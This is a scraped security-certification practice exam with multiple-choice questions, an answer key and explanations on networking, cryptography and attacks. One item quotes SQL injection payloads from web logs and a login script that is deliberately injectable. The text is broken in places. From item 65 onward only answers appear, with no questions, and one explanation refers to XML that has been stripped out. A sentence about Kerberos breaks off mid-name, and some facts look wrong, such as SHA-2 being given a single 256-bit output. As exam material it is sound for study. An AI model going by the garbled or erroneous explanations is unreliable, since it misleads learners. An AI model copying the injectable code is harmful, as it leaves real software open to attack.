OBJ 3.9: The best option based on your choices is FM-200, Biometric locks, Mantrap, and Antivirus. FM-200 is a fire extinguishing system that is commonly used in data centers and server rooms to protect the servers from fire. Biometric locks are often used in high-security areas as a lock on the access door. Additionally, biometric authentication could be used for a server by using a USB fingerprint reader. Mantraps often are used as part of securing a data center as well. This area creates a boundary between a lower security area (such as the offices) and the higher security area (the server room). Antivirus should be installed on servers since they can use signature-based scans to ensure files are safe before being executed.

Question 44

Q

A small doctor’s office has asked you to configure their network to use the highest levels of wireless security and desktop authentication. The office only uses cloud-based SaaS applications to store their patient’s sensitive data. Which TWO of the following protocols or authentication methods should you implement for the BEST security?

WEP
RADIUS
WPS
WPA2
SSO
Multifactor

Answer

A

WPA2, Multifactor

OBJ-4.1: Since everything is being stored within a cloud-based SaaS application, the doctor’s office needs to ensure their network connection is using the highest level of encryption (WPA2), and their desktop authentication should use a multifactor authentication system. Multifactor authentication relies on using at least 2 of the following factors: something you know (password or pin), something you have (smart card or key fob), something you are (fingerprint or retinal scan), or something you do (draw a pattern or how you sign your name).

Question 45

Q

You have been hired as a cybersecurity analyst for a privately-owned bank. Which of the following regulations would have the greatest impact on your bank’s cybersecurity program?

FERPA
SOX
GLBA
HIPAA

Answer

A

GLBA
OBJ-5.8: The Gramm-Leach-Bliley Act (GLBA) is a United States federal law that requires financial institutions to explain how they share and protect their customers’ private information. The Health Insurance Portability and Accountability Act (HIPPA) is a US law designed to provide privacy standards to protect patients’ medical records and other health information provided to health plans, doctors, hospitals, and other health care providers. Sarbanes-Oxley (SOX) is a United States federal law that set new or expanded requirements for all US public company boards, management, and public accounting firms. The Family Educational Rights and Privacy Act (FERPA) of 1974 is a United States federal law that governs the access to educational information and records by public entities such as potential employers, publicly funded educational institutions, and foreign governments.

Question 46

Q

In an effort to improve the security of the Dion Training corporate network, a security administrator wants to update the configuration of their wireless network to have IPSec built into the protocol by default. Additionally, the security administrator would like for NAT to no longer be required for extending the number of IP addresses available. What protocol should the administrator implement on the wireless network to achieve their goals?

WEP
IPv6
WPA2
IPv4

Answer

A

IPv6
OBJ-2.1: IPv6 includes IPSec built into the protocol by default. Additionally, IPv6 also provides an extended IP address range for networks, which eliminates the need for using NAT. IPv4 does not include IPSec or extended IP address ranges by default. WPA2 is the most modern and secure version of wireless encryption for WiFi networks, but it doesn’t include IPSec or extended IP address ranges by default. WEP is an older version of wireless encryption for WiFi networks and doesn’t provide these features by default, either.

Question 47

Q

Dion Training has an open wireless network called “InstructorDemos” for its instructors to use during class, but they do not want any students connecting to this wireless network. The instructors need the “InstructorDemos” network to remain open since some of their IoT devices used during course demonstrations do not support encryption. Based on the requirements provided, which of the following configuration settings should you use to satisfy the instructor’s requirements and prevent students from using the “InstructorDemos” network?

Signal strength
MAC filtering
QoS
NAT

Answer

A

MAC filtering
OBJ-6.3: Since the instructors need to keep the wireless network open, the BEST option is to implement MAC filtering to prevent the students from connecting to the network while still keeping the network open. Since the instructors would most likely use the same devices to connect to the network, it would be relatively easy to implement a MAC filtering based whitelist of devices that are allowed to use the open network and reject any other devices not listed by the instructors (like the student’s laptops or phones). Reducing the signal strength would not solve this issue since students and instructors are both in the same classrooms. Using Network Address Translation and Quality of Service will not prevent the students from accessing or using the open network.

Question 48

Q

A penetration tester hired by a bank began searching for the bank’s IP ranges by performing lookups on the bank’s DNS servers, reading news articles online about the bank, monitoring what times the bank’s employees came into and left work, searching job postings (with a special focus on the bank’s information technology jobs), and even searching the corporate office of the bank’s dumpster. Based on this description, what portion of the penetration test is being conducted?

Active information gathering
Passive information gathering
Vulnerability assessment
Information reporting

Answer

A

Passive information gathering

OBJ-1.4: Passive information gathering consists of numerous activities where the penetration tester gathers information that is open-source or publicly available, without the organization under investigation being aware that the information has been accessed. Active information gathering instead starts to probe the organization using techniques like DNS Enumeration, Port Scanning, and OS Fingerprinting. Vulnerability assessments are another form of active information gathering. Information reporting occurs after the penetration test is complete, and it involves writing a final report with the results, vulnerabilities, and lessons learned during the assessment.

Question 49

Q

Your company just launched a new invoicing website for use by your five largest vendors. You are the cybersecurity analyst and have been receiving numerous phone calls that the webpage is timing out, and the website overall is performing slowly. You have noticed that the website received three million requests in just 24 hours, and the service has now become unavailable for use. What do you recommend should be implemented to restore and maintain the availability of the new invoicing system?

Intrusion Detection System
VPN
MAC filtering
Whitelisting

Answer

A

Whitelisting
OBJ-2.4: By implementing whitelisting of the authorized IP addresses for the five largest vendors, they will be the only ones who will be able to access the webserver. This can be done by creating rules in the Access Control List (ACL) to deny ALL other users except these five vendors, thereby dropping a large number of requests from any other IP addresses, such as those from an attacker. Based on the description in the scenario, it appears like the system is under some form of denial of service attack, but by implementing a whitelist at the edge of the network and blackholing any traffic from IP addresses that are not whitelisted, the server will no longer be overwhelmed or perform slowly to respond to legitimate requests. MAC filtering is only applicable at layer 2 of the OSI model (which would not work for traffic being sent over the internet from your vendors to your server). A VPN is a reasonable solution to help secure the connection between the vendors and your systems, but it will not deal with the DoS condition being experienced. An intrusion detection system may detect the DoS condition, but an IDS cannot resolve the condition (whereas an IPS could).

Question 50

Q

Which cloud computing concept is BEST described as focusing on replacing the hardware and software required when creating and testing new applications and programs from a customer’s environment with cloud-based resources?

SaaS
SECaaS
IaaS
PaaS

Answer

A

PaaS
OBJ-3.7: Platform as a Service (PaaS) provides the end-user with a development environment without all the hassle of configuring and installing it themselves. If you want to develop a customized or specialized program, PaaS helps reduce the development time and overall costs by providing a ready to use platform.

Question 51

Q

What popular open-source port scanning tool is commonly used for host discovery and service identification?

nmap
dd
services.msc
Nessus

Answer

A

nmap
OBJ-2.2: The world’s most popular open-source port scanning utility is nmap. The Services console (services.msc) allows an analyst to disable or enable Windows services. The dd tool is used to copy files, disk, and partitions, and it can also be used to create forensic disk images. Nessus is a proprietary vulnerability scanner developed by Tenable. While Nessus does contain the ability to conduct a port scan, its primary role is as a vulnerability scanner, and it is not an open-source tool.

Question 52

Q

Your organization has recently been the target of a spearphishing campaign. You have identified the website associated with the link in the spearphishing emails and want to block it. Which of the following techniques would be the MOST effective in this situation?

URL filter
Application blacklist
Quarantine
Containment

Answer

A

URL filter
OBJ-2.3: A URL filter can be used to block a website based on its website address or universal resource locator (URL). This is not a containment technique, but a blocking and filtering technique. Quarantine would be used against an infected machine, and it would not be effective against trying to block access to a given website across the entire organization. An application blacklist is used to prevent an application from running, so this cannot be used to block a single malicious or suspicious website or URL.

Question 53

Q

A penetration tester has been hired to conduct an assessment, but the company wants to exclude social engineering from the list of authorized activities. Which of the following documents would include this limitation?

Service level agreement
Memorandum of understanding
Acceptable use policy
Rules of engagement

Answer

A

Rules of engagement
OBJ-1.4: While the network scope given in the contract documents will define what will be tested, the rules of engagement defines how that testing is to occur. Rules of engagement can state things like no social engineering is allowed, no external website scanning, etc. A memorandum of understanding (MOU) is a preliminary or exploratory agreement to express an intent to work together that is not legally binding and does not involve the exchange of money. A service level agreement contains the operating procedures and standards for a service contract. An acceptable use policy is a policy that governs employees’ use of company equipment and internet services.

Question 54

Q

A hacker successfully modified the sale price of items purchased through your company’s web site. During the investigation that followed, the security analyst has verified the web server, and the Oracle database was not compromised directly. The analyst also found no attacks that could have caused this during their log verification of the Intrusion Detection System (IDS). What is the most likely method that the attacker used to change the sale price of the items purchased?

SQL injection
Changing hidden form values
Cross-site scripting
Buffer overflow attack

Answer

A

Changing hidden form values

OBJ-2.4: Since there are no indications in the IDS logs, the database, or the server, it is most likely that the hacker changed hidden form values to change the price of the items in the shopping cart. A buffer overflow is an anomaly that occurs when a program overruns the buffer’s boundary and overwrites adjacent memory locations while writing data to a buffer. Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end-user. SQL injection is a code injection technique used to attack data-driven applications in which malicious SQL statements are inserted into an entry field for execution, such as dumping the database contents to the attacker.

Question 55

Q

You conducted a security scan and found that port 389 is being used when connecting to LDAP for user authentication instead of port 636. The security scanning software recommends that you remediate this by changing user authentication to port to 636 wherever technically possible. What should you do?

Change all devices and servers that support it to port 636 since port 389 is a reserved port that requires root access and can expose the server to privilege escalation attacks

Mark this as a false positive in your audit report since the services that typically run on ports 389 and 636 are identical

Change all devices and servers that support it to port 636 since encrypted services run by default on port 636

Conduct remediation actions to update encryption keys on each server to match port 636

Answer

A

Change all devices and servers that support it to port 636 since encrypted services run by default on port 636

OBJ-2.6: LDAP can be run on either port 389 or port 636. Port 389 is the standard port for LDAP but typically runs unencrypted LDAP services over this port. Instead, you should change all devices and servers that can technically support the change to port 636, since LDAP services over port 636 are encrypted by default.

Question 56

Q

When conducting forensic analysis of a hard drive, what tool would BEST prevent changing the contents of the hard drive during your analysis?

Software write blocker
Forensic drive duplicator
Hardware write blocker
Degausser

Answer

A

Hardware write blocker

OBJ-5.5: Both hardware and software write blockers are designed to ensure that forensic software and tools cannot change a drive inadvertently by accessing it. But, since the question indicates that you need to choose the BEST solution to protect the contents of the drive from being changed during analysis, you should pick the hardware write blocker. The primary purpose of a hardware write blocker is to intercept and prevent (or ‘block’) any modifying command operation from ever reaching the storage device. A forensic drive duplicator simply copies a drive and validates that it matches the original drive, but cannot be used by itself during analysis. A degausser is used to wipe magnetic media. Therefore, it should not be used on the drive since it would erase the contents of the hard drive.

Question 57

Q

Which of the following authentication protocols was developed by Cisco to provide authentication, authorization, and accounting services?

Kerberos
RADIUS
TACACS+
CHAP

Answer

A

TACACS+

OBJ-4.2: TACACS+ is an extension to TACACS (Terminal Access Controller Access Control System) and was developed as a proprietary protocol by Cisco. The Remote Authentication Dial-In User Service (RADIUS) is a networking protocol that operates on port 1812 and provides centralized Authentication, Authorization, and Accounting management for users who connect and use a network service, but it was not developed by Cisco. Kerberos is an open-source network authentication protocol designed by Matte Challenge-Handshake Authentication Protocol (CHAP) is used to authenticate a user or network host to an authenticating entity. CHAP is an authentication protocol but does not provide authorization or accounting services

Question 58

Q

Which of the following hashing algorithms results in a 128-bit fixed output?

MD-5
SHA-1
SHA-2
RIPEMD

Answer

A

MD-5

OBJ-6.2: MD-5 creates a 128-bit fixed output. SHA-1 creates a 160-bit fixed output. SHA-2 creates a 256-bit fixed output. RIPEMD creates a 160-bit fixed output.

Question 59

Q

What technology is NOT PKI x.509 compliant and cannot be used in a variety of secure functions?

Blowfish
SSL/TLS
AES
PKCS

Answer

A

Blowfish

OBJ-6.4: AES, PKCS, and SSL/TLS are all compatible with x.509 and can be used in a wide variety of functions and purposes. AES is used for symmetric encryption. PKCS is used as a digital signature algorithm. SSL/TLS is used for the secure key exchange.

Question 60

Q

Which of the following cryptographic algorithms is classified as symmetric?

RSA
Blowfish
ECC
PGP

Answer

A

Blowfish

OBJ-6.2: Blowfish is a symmetric-key block cipher, designed in 1993 by Bruce Schneier and included in many cipher suites and encryption products. ECC, PGP, and RSA are all asymmetric algorithms.

Question 61

Q

Which of the following authentication mechanisms involves receiving a one-time use shared secret password, usually through a token-based key fob or smartphone app, that does not expire?

TOTP
EAP
Smart card
HOTP

Answer

A

HOTP

OBJ-4.3: HMAC-based One-time Password Algorithm (HOTP) is an algorithm for token-based authentication. The authentication server and client token are configured with the same shared secret. The token could be a fob-type device or implemented as a smartphone app. The token does not have an expiration under HOTP, but an improved version known as TOTP does include token expirations.

Question 62

Q

The local electric power plant contains both business networks and ICS/SCADA networks to control their equipment. Which technology should the power plant’s security administrators look to implement first as part of configuring better defenses for the ICS/SCADA systems?

Intrusion prevention system
Log consolidation
Automated patch deployment
Anti-virus software

Answer

A

Intrusion prevention system

OBJ-3.5: Since this question is focused on the ICS/SCADA network, the best solution would be to implement an Intrusion Prevention System on the network. ICS/SCADA machines utilize very specific commands to control the equipment and to prevent malicious activity. You could set up strict rules in the IPS to prevent unknown types of actions from being allowed to occur. Log consolidation is a good idea, but it won’t prevent an issue and therefore isn’t the most critical thing to add first. Automated patch management should not be conducted, as ICS/SCADA systems must be tested prior to conducting any patches. Often, patches will break ICS/SCADA functionality. Anti-virus software may or may not be able to run on the equipment, as well, since some ICS/SCADA systems often do not rely on standard operating systems like Windows.

Question 63

Q

A security analyst is conducting a log review of the company’s web server and found two suspicious entries: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- [12Jun2020 10:07:23] “GET /logon.php?user=test’+oR+7>1%20—HTTP/1.1” 200 5825 [12Jun2020 10:10:03] “GET /logon.php?user=admin’;%20—HTT{/1.1” 200 5845 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- The analyst contacts the web developer and asks for a copy of the source code to the logon.php script. The script is as follows: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= php include(‘../../config/db_connect.php’); $user = $_GET[‘user’]; $pass = $_GET[‘pass’]; $sql = “SELECT * FROM USERS WHERE username = ‘$user’ AND password = ‘$pass’”; $result = MySQL_query($sql) or die (“couldn’t execute query”); if (MySQL_num_rows($result) !=0 ) echo ‘Authentication granted!’; else echo ‘Authentication failed!’; ?> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Based on source code analysis, which type of vulnerability is this web server vulnerable to?

SQL injection
Command injection
LDAP injection
Directory traversal

Answer

A

SQL injection

OBJ-1.2: Based on the log entries, it appears the attack was successful in conducting a SQL injection. Notice the escape character (‘) used in the log. In the script, a connection to the MySQL database is being used, which could be exploited since no input validation is being performed. Command injection is an attack in which the goal is the execution of arbitrary commands on the host operating system via a vulnerable application. SQL injection is a specific type of command injection. LDAP injection is a code injection technique used to exploit web applications that could reveal sensitive user information or modify information represented in the LDAP (Lightweight Directory Access Protocol) data stores. Directory traversal or Path Traversal is an HTTP attack that allows attackers to access restricted directories and execute commands outside of the web server’s root directory.

Question 64

Q

What is a major security risk that could occur when you comingle hosts/servers with different security requirements in a single network?

Privilege creep
Password compromises
Security policy violations
Zombie attacks

Answer

A

Security policy violations
OBJ-2.3: A network is only as strong as its weakest link (or host/server). When you comingle hosts/servers, there is a large risk that security policy violations could occur. This is because users may be used to follow a less stringent security policy for one set of machines, and carry over those procedures to a machine that should have had stronger security policies.

Answer 65

A

Preparation, Identification, Containment, Eradication, Recovery, and Lessons Learned

OBJ-5.4: The proper order of the Incident Response process is Preparation, Identification, Containment, Eradication, Recovery, and Lessons Learned. Concepts with lists of steps are common questions asked as an ordering or a drag and drop question on the exam. For example, the steps of an incident response, the order of volatility, or the strength of encryption schemes could be asked using this question format.

Answer 66

A

EAP

OBJ-4.3: The IEEE 802.1X Port-based Network Access Control framework establishes several ways for devices and users to be securely authenticated before they are permitted full network access. The actual authentication mechanism will be some variant of the Extensible Authentication Protocol (EAP). EAP allows lots of different authentication methods, but many of them use a digital certificate on the server and/or client machines. This allows the machines to establish a trust relationship and create a secure tunnel to transmit the user authentication credential.

Answer 67

A

Port scan targeting 10.10.3.6

OBJ-2.2: Port Scanning is the name for the technique used to identify open ports and services available on a network host. Based on the logs, you can see a sequential scan of some commonly used ports (20, 21, 22, 23, 25, 80, 135, 443, 445) with a two-second pause between each attempt. The source of the scan is 10.10.3.2, and the destination of the scan is 10.10.3.6, making “Port scan targeting 10.10.3.6” the correct choice. IP fragmentation attacks are a common form of denial of service attack, in which the perpetrator overbears a network by exploiting datagram fragmentation mechanisms. A denial-of-service (DoS) attack occurs when legitimate users are unable to access information systems, devices, or other network resources due to the actions of a malicious cyber threat actor.

Answer 68

A

http.request.methd==”POST” && ip.dst=10.1.2.3

OBJ-2.2: Filtering the available PCAP with just the http “post” methods would display any data sent when accessing a REST API, regardless of the destination IP. Filtering the available PCAP with just the desired IP address would show all traffic to that host (10.1.2.3). By combining both of these, you can minimize the data displayed to only show things posted to the API located at 10.1.2.3. The ip.proto=tcp filter would display all TCP traffic on a network, regardless of the port, IP address, or protocol being used. It would simply produce too much information to analyze.

Answer 69

A

OpenID Connect
OBJ-4.2: OAuth 2 is explicitly designed to authorize claims and not to authenticate users. The implementation details for fields and attributes within tokens are not defined. Open ID Connect (OIDC) is an authentication protocol that can be implemented as special types of OAuth flows with precisely defined token fields. Security Assertion Markup Language (SAML) is an open standard for exchanging authentication and authorization data between parties, in particular, between an identity provider and a service provider. SAML is an XML-based markup language for security assertions. Active Directory Federation Services (ADFS) is a software component developed by Microsoft that can run on Windows Server operating systems to provide users with single sign-on access to systems and applications located across organizational boundaries. Kerberos is a computer network authentication protocol that works on the basis of tickets to allow nodes communicating over a non-secure network to prove their identity to one another in a secure manner.

Answer 70

A

The beacon’s protocol

OBJ-1.4: The beacon’s protocol is not typically a means of identifying a malware beacon. A beacon can be sent over numerous protocols, including ICMP, DNS, HTTP, and numerous others. Unless you specifically knew the protocol being used by the suspected beacon, filtering out beacons by the protocol seen in the logs could lead you to eliminate malicious behavior prematurely. Other factors like the beacon’s persistence (if it remains after a reboot of the system) and the beacon’s interval (how much time elapses between beaconing)are much better indicators for fingerprinting a malicious beacon. The removal of known traffic by the script can also minimize the amount of data the cybersecurity analyst needs to analyze, therefore making it easier to detect the malicious beacon without wasting their time reviewing non-malicious traffic.

Answer 71

A

Credentialed scan

OBJ-1.5: Credentialed scans log into a system and retrieve their configuration information. Therefore, it should provide you with the best results. Non-credentialed scans rely on external resources for configuration settings that can be altered or incorrect. The network location of the scanner does not have a direct impact on the ability to read the configuration information, so it would not make a difference if you conducted an external or internal scan.

Answer 72

A

Port scan

OBJ-2.2: Based on the description provided, this is most likely a port scan. Using a tool like nmap, an attacker can create a SYN scan across every port in a range against the desired target. A port scan or SYN scan may trigger an alert in your IDS. While scanners support more stealthy scans, default scans may connect to each port sequentially. The other options are incorrect because a remote host will typically connect to only a single port associated with a service, a SYN flood normally sends many SYNs to a single system but doesn’t send them to unused ports, and a UDP probe will not send SYN packets.

Answer 73

A

The attack widely fragmented the image across the host file system

OBJ-5.5: Due to the deletion of the VM disk image, you will now have to conduct file carving or other data recovery techniques to recover and remediate the virtualized server. If the server’s host uses a proprietary file system, such as VMFS on ESXi, this can further limit support by data recovery tools. The attacker may have widely-fragmented the image across the host file system when they deleted the disk image. VM instances are most useful when they are elastic (meaning they optimally spin up when needed) and then destroyed without preserving any local data when security has performed the task, but this can lead to the potential of lost system logs. To prevent this, most VMs also save their logs to an external syslog server or file. Virtual machine file formats are image-based and written to a mass storage device. Depending on the configuration and VM state, security must merge any checkpoints to the main image, using a hypervisor tool, not recovery from an old snapshot, and then roll forward. It is possible to load VM data into a memory analysis tool, such as Volatility, although the file formats used by some hypervisors require conversion first, or it may not support the analysis tool.

Answer 74

A

Performing packet capture and analysis on a network

OBJ-2.2: Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development, and education. It cannot perform any of the other three options.

Answer 75

A

Bluejacking

OBJ-1.2: Bluejacking is the sending of unsolicited messages over Bluetooth to Bluetooth-enabled devices such as smartphones and tablets. Bluesnarfing, on the other hand, involves taking data from a smartphone or tablet over Bluetooth without permission. Bluetooth has a very limited range, so the attacker is likely within 10 meters of the victimized device. Geotagging involves embedded the geolocation coordinates into a piece of data (normally a photo or video). Packet sniffing is a passive method of collecting network traffic for follow-on analysis at a later time.

Answer 76

A

DaaS

OBJ-3.7: Desktop as a Service (DaaS) provides a full virtualized desktop environment from within a cloud-based service. This is also known as VDI (Virtualized Desktop Infrastructure) and is coming in large enterprise businesses that are focused on increasing their security and minimizing their operational expenses. Shadow PC (shadow.tech) provides a version of DaaS for home users who want to have a gaming PC without all the upfront costs.

Answer 77

A

Implement NAC

OBJ-2.1: Network Access Control (NAC) uses a set of protocols to define and implement a policy that describes how to secure access to network nodes whenever a device initially attempts to access the network. NAC can utilize an automatic remediation process by fixing non-compliant hosts before allowing network access. Network Access Control can control access to a network with policies, including pre-admission endpoint security policy checks and post-admission controls over where users and devices can go on a network and what they can do. In this scenario, implementing NAC can identify which machines are known and trusted Dion Training assets, and provide them with access to the secure internal network. NAC could also determine which are unknown machines (assumed to be those of CompTIA employees), and provide them with direct internet access only by placing them onto a guest network or VLAN. While MAC filtering could be used to allow or deny access to the network, it cannot by itself control which set of network resources could be utilized from a single ethernet port. A security information and event management (SIEM) system provides real-time analysis of security alerts generated by applications and network hardware. An access control list could define what ports, protocols, or IP addresses the ethernet port could be utilized, but it would be unable to distinguish between a Dion Training employee’s laptop and a CompTIA employee’s laptop like a NAC implementation could.

Answer 78

A

Trojan

OBJ-1.1: A trojan is a program in which malicious or harmful code is contained inside an apparently harmless program. In this example, the harmless program is the key generator (which does create a license key), but it also has malicious code inside of it (causing the additional alerts from the antimalware solution). Likely, this keygen has an embedded virus or remote access trojan (RAT) in its programming.

Answer 79

A

IaaS

OBJ-3.7: Infrastructure as a Service (Iaas) is focused on moving your servers and computers into the cloud. If you purchase a server in the cloud and then install and manage the operating system and software on it, this is Iaas.

Answer 80

A

SHA-256

OBJ-5.5: SHA-256 is the Secure Hash Algorithm with a 256-bit length output. This is one of the most common hash algorithms in use and is employed in many applications and protocols. SHA-256 and other hashing algorithms are used to ensure the data integrity of a file has not been altered. RSA, 3DES, and AES are all encryption algorithms. These algorithms can ensure confidentiality but not integrity.

Answer 81

A

Malicious processes

OBJ-2.4: A malicious process is one that is running on a system and is outside the norm. This is a host-based indicator of compromise (IOC) and is not directly associated with an account-based IOC. Off-hours usage, unauthorized sessions, and failed logins are all account-based examples of an IOC. Off-hours usage occurs when an account is observed to log in during periods outside of normal business hours. This is often used by an attacker to avoid detection during business hours. Unauthorized sessions occur when a device or service is accessed without authorization. For example, if a limited privilege user is signed into a domain controlled. A failed login might be normal if a user forgets or incorrectly types their password, but repeated failures for one account could also be an indication of an attacked to crack a user’s password.

Answer 82

A

Defense in depth

OBJ-3.1: Defense in depth is the concept of layering various network appliances and configurations to create a more secure and defensible architecture. Dion Training appears to be using various host-based and network-based devices to help ensure there are multiple layers of security in the network.

Answer 83

A

Disable WPS
OBJ-6.3: WPS was created to ease the setup and configuration of new wireless devices by allowing the router to automatically configure them after a short eight-digit PIN was entered. Unfortunately, WPS is vulnerable to a brute-force attack and is easily compromised. Therefore, WPS should be disabled on all wireless networks. If Bob was able to enter your apartment and press the WPS button, he could have configured his laptop to use your wireless network without your WPA2 password.

Answer 84

A

RADIUS

OBJ-6.3: Captive portals usually rely on 802.1x, and 802.1x uses RADIUS for authentication.

Answer 85

A

3389, 1701, 389, 88

OBJ 2.6: For the exam, you need to know your ports and protocols. The Remote Desktop Protocol (RDP) operates over port 3389. Layer 2 Tunneling Protocol (L2TP) operates over port 1701. The Lightweight Directory Access Protocol (LDAP) operates over port 389. Kerberos operates over port 88.

Answer 86

A

Passwords

OBJ-2.2: John the Ripper is a free, open-source password cracking software tool. It is utilized to test the strength of passwords during a technical assessment. John the Ripper supports both dictionary and brute force attacks.

Answer 87

A

A buffer overflow that is known to allow remote code execution

OBJ-1.6: The most serious vulnerability discovered is one that could allow remote code execution to occur. Since this buffer overflow vulnerability is known to allow remote code execution, it must be mitigated first to most effectively prevent a security breach. While the other issues all should be addressed eventually, you need to prioritize the most critical one (remote code execution) on a public-facing IP address. A public-facing IP address means the device is accessible from the internet.

Answer 88

A

Syslog

OBJ-2.1: The syslog server is a centralized log management solution. By looking through the logs on the syslog server, the technician could determine which service failed on which server, since all the logs are retained on the syslog server from all of the network devices and servers. Network mapping is conducted using active and passive scanning techniques and could assist in determining which server was offline, but not what caused the interruption. Firewall logs would only assist in determining why the network connectivity between a host and destination may have been disrupted. A network intrusion detection system (NIDS) is used to detect hacking activities, denial of service attacks, and port scans on a computer network. It is unlikely to provide the details needed to identify why the network service was interrupted.

Answer 89

A

Any security flaws present in the library will also be present in the developed application

OBJ-3.6: Any security flaws present in a commercial or open-source library will also be present in the developed application. A library is vulnerable, just as any other application or code might be. There are both known (discovered) and unknown vulnerabilities that could exist in the libraries being integrated into the project. Therefore, the software development team needs to ensure that they are monitoring the applicable libraries for additional CVEs that might be uncovered at a later date, that they have plans for how to distribute appropriate patches to their customers and a plan for integrating subsequent updates into their own codebase. Open-source libraries are not more vulnerable or insecure than commercial available or in-house developed libraries. In fact, most open-source software is more secure because it is widely analyzed and reviewed by programmers all around the world. While ensuring the most up to date versions of the libraries is a valid concern, as a cybersecurity analyst, you should be more concerned with current security flaws in the library so you can conduct risk management and implement controls to mitigate these vulnerabilities, and determine the method for continuing updates and patch support.

Answer 90

A

Configure a virtual switch on the physical server and create VLANs

OBJ-3.2: A virtual switch is a software application that allows communication between virtual machines. A virtual local area network (VLAN) is a hardware-imposed network segmentation created by switches. This solution provides logical separation of each virtual machine through the use of VLANs on the virtual switch.

Answer 91

A

A behavior-based analysis tool

OBJ-2.1: A behavior-based analysis tool can be used to capture/analyze normal behavior and then alert when an anomaly occurs. Configuring a behavior-based analysis tool requires more effort to properly set up, but it requires less work and manual monitoring once it is running. Signature-based detection is a process where a unique identifier is established about a known threat so that the threat can be identified in the future. Manual analysis requires a person to read all the output and determine if it is erroneous. A log analysis tool would only be useful to analyze the logs, but it would not be able to detect unexpected output by itself. Instead, the log analysis tool would need to use a behavior-based or signature-based detection system.

Answer 92

A

NAC

OBJ-2.1: Network Access Control (NAC) is an approach to computer security that attempts to unify endpoint security technology (such as anti-virus, host intrusion prevention, and vulnerability assessment), the user or system authentication, and network security enforcement. When a remote workstation connects to the network, NAC will place it into a segmented portion of the network (sandbox), scan it for malware and validate its security controls, and then based on the results of those scans, either connect it to the company’s networks or place the workstation into a separate quarantined portion of the network for further remediation. An access control list (ACL) is a type of network traffic filter that can control incoming or outgoing traffic. An ACL alone would not have prevented this issue. MAC Filtering refers to a security access control method whereby the MAC address assigned to each network card is used to determine access to the network. MAC filtering operates at layer 2 and is easy to bypass. Sender Policy Framework (SPF) is an email authentication method designed to detect forging sender addresses during the delivery of the email.

Answer 93

A

RDP

OBJ-2.6: Port 3389 is an RDP port used for the Remote Desktop Protocol. If this port isn’t supposed to be opened, then an incident response plan should be the next step since this can be used for remote access by an attacker. MySQL runs on port 3306. LDAP runs on port 389. IMAP over SSL runs on port 993.

Answer 94

A

Physical hardware

OBJ-3.7: The bottom layer is physical hardware in this environment. It is what sits beneath the hypervisor and controls access to guest operating systems. The bare-metal approach doesn’t have a host operating system.

Answer 95

A

Directing traffic to internal services if the contents of the traffic comply with the policy

OBJ-2.1: A reverse proxy is positioned at the cloud network edge and directs traffic to cloud services if the contents of that traffic comply with the policy. This does not require the configuration of the users’ devices. This approach is only possible if the cloud application has proxy support. You can deploy a reverse proxy and configure it to listen for client requests from a public network, like the internet. The proxy then creates the appropriate request to the internal server on the corporate network and passes the response from the server back to the external client. They are not generally intended to obfuscate the source of communication, nor are they necessarily specific to the cloud. A cloud access security broker (CASB) can be used to prevent unauthorized use of cloud services from the local network.

Answer 96

A

Missing patches

OBJ-3.3: Missing patches are the most common vulnerability found on both Windows and Linux systems. When a security patch is released, attackers begin to reverse engineer the security patch to exploit the vulnerability. If your servers are not patched against the vulnerability, they can become a victim of the exploit, and the data contained on the server can become compromised. Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. Cross-site scripting focuses on exploiting a user’s workstation, not a server. CRLF injection is a software application coding vulnerability that occurs when an attacker injects a CRLF character sequence where it is not expected. SQL injection is the placement of malicious code in SQL statements, via web page input. SQL is commonly used against databases, but they are not useful when attacking file servers.

Answer 97

A

Shibboleth

OBJ-4.2: Shibboleth is a standards-based, open-source software package for single sign-on across or within organizational boundaries on the web. It allows sites to make informed authorization decisions for individual access of protected online resources in a privacy-preserving manner. Shibboleth utilizes SAML to provide this federated single sign-on and attribute exchange framework.

Answer 98

A

Hybrid attack

OBJ 1.2: Based on the passwords found in the example, Jason’s new password cracker is most likely using a hybrid approach. All of the passwords found are dictionary words with some additional characters added to the end. For example, Jason’s password of rover123 is made up of the dictionary word “rover” and the number 123. It is likely that the cracker attempted to use a dictionary word (like rover) and the attempted variations on it using brute force (such as adding 000, 001, 002, …122, 123) to the end of the password until found. Combining the dictionary and brute force methods into a single tool is known as a hybrid password cracking approach.

Answer 99

A

Managerial

OBJ-5.7: Managerial or administrative controls are used to determine the way people act. These include policies, procedures, and guidance. Mandatory vacation policies, job rotation policies, and separation of duties policies are great examples of managerial controls.

Answer 100

A

XML injection

OBJ-1.2: This is an example of a XML injection. XML injection manipulates or compromises the logic of an XML application or service. The injection of unintended XML content and/or structures into an XML message can alter the intended logic of an application, and XML Injection can cause the insertion of malicious content into resulting messages/documents. In this case, the URL is attempting to modify the server’s XML structure. The original XML structure would be: . By using the URL above, this would be modified to the following: . The result would be that a new line was added to the XML document that could be processed by the server. This line would allow 10 of the product at $0.00 to be added to the shopping cart, while 0 of the product at $50.00 is added to the cart. This defeats the integrity of the e-commerce store’s add to cart functionality through this XML injection. A SQL injection occurs when data input by a user is interpreted as a SQL command rather than as normal data by the backend database. A buffer overflow is an exploit that attempts to write data to a buffer and exceed that buffer’s boundary to overwrite an adjacent memory location. A session hijacking attacks consists of the exploitation of the web session control mechanism, which is normally managed for a session token. The real key to answering this question is identifying the XML structured code being entered as part of the URL, which is shown by the bracketed data.

Answer 101

A

Blue team

OBJ-5.4: Penetration testing can form the basis of functional exercises. One of the best-established means of testing a security system for weaknesses is to play “war game” exercises in which the security personnel split into teams: red, blue, and white. The red team acts as the adversary. The blue team acts as the defenders. The white team acts as the referees and sets the parameters for the exercise. The yellow team is responsible for building tools and architectures in which the exercise will be performed.

Answer 102

A

His email account requires multifactor authentication

OBJ-4.1: If a user or system has configured their email accounts to require two-factor authentication (2FA) or multifactor authentication, then even if they enter their username and password correctly in the third-party email client, they will receive the “Invalid credentials” error message. Some email servers will allow the user to create an Application Specific Password to bypass the multifactor authentication requirement to overcome this, or the user will have to use an email client that supports multifactor authentication.

Answer 103

A

